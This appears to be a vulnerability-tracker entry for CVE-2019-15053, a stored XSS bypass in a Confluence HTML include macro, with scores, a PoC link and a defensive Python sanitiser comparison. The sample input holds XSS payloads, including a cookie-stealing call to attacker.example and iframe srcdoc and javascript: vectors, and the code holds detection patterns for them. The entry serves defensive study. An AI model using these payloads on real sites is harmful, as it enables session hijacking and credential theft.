CVE-2019-15053

MEDIUM

HTML Include and Replace Macro < 1.5.0 - Cross-Site Scripting via IFRAME Element (bypass of includeScripts=false)

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2019-15053, a PoC published by l0nax.

AI-analyzed exploit summary

The repository contains a working proof of concept for CVE-2019-15053, a stored XSS in the HTML Include and Replace Macro plugin for Confluence Server. It shows how an authenticated page editor can bypass the plugin's includeScripts=false setting and have arbitrary JavaScript run in the Confluence origin, which the PoC uses for session hijacking.

Description

The "HTML Include and replace macro" plugin before 1.5.0 for Confluence Server allows a bypass of the includeScripts=false XSS protection mechanism via vectors involving an IFRAME element.
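The defect class behind this entry, shown as an added illustration that is not code from the plugin or from the l0nax PoC: assume, hypothetically, that includeScripts=false is implemented as a denylist that strips <script> elements from the fetched HTML. The page only says the bypass "involves an IFRAME element", so the sample input below is constructed for the demonstration rather than being the PoC payload. The block contrasts that denylist with an allowlist sanitiser and ends with a check that reports which script-execution vectors survive each filter; the names ScriptTagStripper, AllowlistSanitizer, VectorFinder and SAMPLE_INCLUDE are all this example's own.

```python
"""Denylist script stripping versus allowlist sanitising of included HTML.
Added illustration, not code from the HTML Include and Replace Macro plugin
or the l0nax proof of concept. It assumes, hypothetically, that
includeScripts=false is a denylist removing <script> elements; the page only
says the bypass involves an IFRAME element, so the sample input is constructed."""
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample of what an attacker-hosted page pulled in by the macro might serve.
SAMPLE_INCLUDE = """
<h1>Release notes</h1>
<script>new Image().src='https://attacker.example/?c='+document.cookie</script>
<iframe srcdoc="&lt;script&gt;alert(document.domain)&lt;/script&gt;"></iframe>
<iframe src="javascript:alert(document.domain)"></iframe>
<p onclick="alert(document.domain)">Click for details</p>
"""

ALLOWED_TAGS = {"h1", "h2", "p", "a", "b", "i", "em", "strong", "ul", "ol", "li", "br", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}}   # no on*, style or srcdoc on any element
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}


def is_safe_url(value: str) -> bool:
    """Scheme allowlist; browsers ignore control chars and whitespace inside a scheme."""
    head = re.split(r"[/?#]", re.sub(r"[\x00-\x20]", "", value).lower(), maxsplit=1)[0]
    return ":" not in head or head.split(":", 1)[0] in SAFE_SCHEMES


class ScriptTagStripper(HTMLParser):
    """Hypothetical denylist: drop <script> elements, pass everything else through verbatim."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out, self.skipping = [], 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.skipping += 1
        elif not self.skipping:
            self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        if tag != "script" and not self.skipping:
            self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        if tag == "script":
            self.skipping = max(0, self.skipping - 1)
        elif not self.skipping:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(data)

    def handle_entityref(self, name):
        self.handle_data(f"&{name};")

    def handle_charref(self, name):
        self.handle_data(f"&#{name};")


class AllowlistSanitizer(HTMLParser):
    """Only listed tags/attributes survive; iframe, object etc. are dropped with their content."""

    def __init__(self):
        super().__init__()
        self.out, self.dropping = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.dropping += 1
        elif not self.dropping and tag in ALLOWED_TAGS:
            kept = [(n, v or "") for n, v in attrs if n in ALLOWED_ATTRS.get(tag, ())]
            kept = [(n, v) for n, v in kept if n not in URL_ATTRS or is_safe_url(v)]
            self.out.append("<" + tag + "".join(f' {n}="{escape(v)}"' for n, v in kept) + ">")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.dropping = max(0, self.dropping - 1)
        elif not self.dropping and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data))   # text is re-escaped, so it can never become markup


class VectorFinder(HTMLParser):
    """Check: which script-execution vectors does a filtered document still carry?"""

    def __init__(self):
        super().__init__()
        self.found = set()

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found.add("script")
        for name, value in attrs:
            if name.startswith("on"):
                self.found.add("event-handler")
            if tag == "iframe" and name == "srcdoc":
                self.found.add("iframe-srcdoc")   # srcdoc content runs in the embedding page's origin
            if name in URL_ATTRS and not is_safe_url(value or ""):
                self.found.add(f"{tag}-{name}-unsafe-scheme")


def _run(parser_cls, html):
    p = parser_cls()
    p.feed(html)
    p.close()
    return p

def strip_scripts(html: str) -> str:
    return "".join(_run(ScriptTagStripper, html).out)

def sanitize_allowlist(html: str) -> str:
    return "".join(_run(AllowlistSanitizer, html).out)

def residual_script_vectors(html: str) -> set:
    return _run(VectorFinder, html).found
```

Run `residual_script_vectors(strip_scripts(SAMPLE_INCLUDE))` and the denylist output still reports an iframe with srcdoc, an iframe with a javascript: src and an inline event handler; the same check on `sanitize_allowlist(SAMPLE_INCLUDE)` reports nothing. The point for reviewers of this kind of fix is that removing one element type is not a security boundary: anything that can carry script must be refused, and a real deployment should use a maintained sanitiser rather than this sketch.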

Exploits (1)

nomisec WORKING POC
by l0nax · poc
https://github.com/l0nax/CVE-2019-15053


Classification: Working PoC (95%)
Attack type: XSS
Complexity: Trivial
Reliability: Reliable
Target: HTML Include and Replace Macro for Confluence Server (versions 1.4.2 and before)
Auth required: yes
Prerequisites: access to upload an HTML file to a public server; ability to create/edit a Confluence page with the vulnerable macro
Analyzed by devstral-2, Feb 18, 2026

References (2)

https://github.com/l0nax/CVE-2019-15053 (Exploit, Third Party Advisory)

Scores

CVSS v3: 6.8 (Medium), vector CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
Attack vector: Network
EPSS: 0.0132 (percentile 67.2%)

Details

CWE: CWE-79
Status: published
Products (1): atlassian/html_include_and_replace_macro 1.1 - 1.4.2
Published: Aug 14, 2019
Tracked since: Feb 18, 2026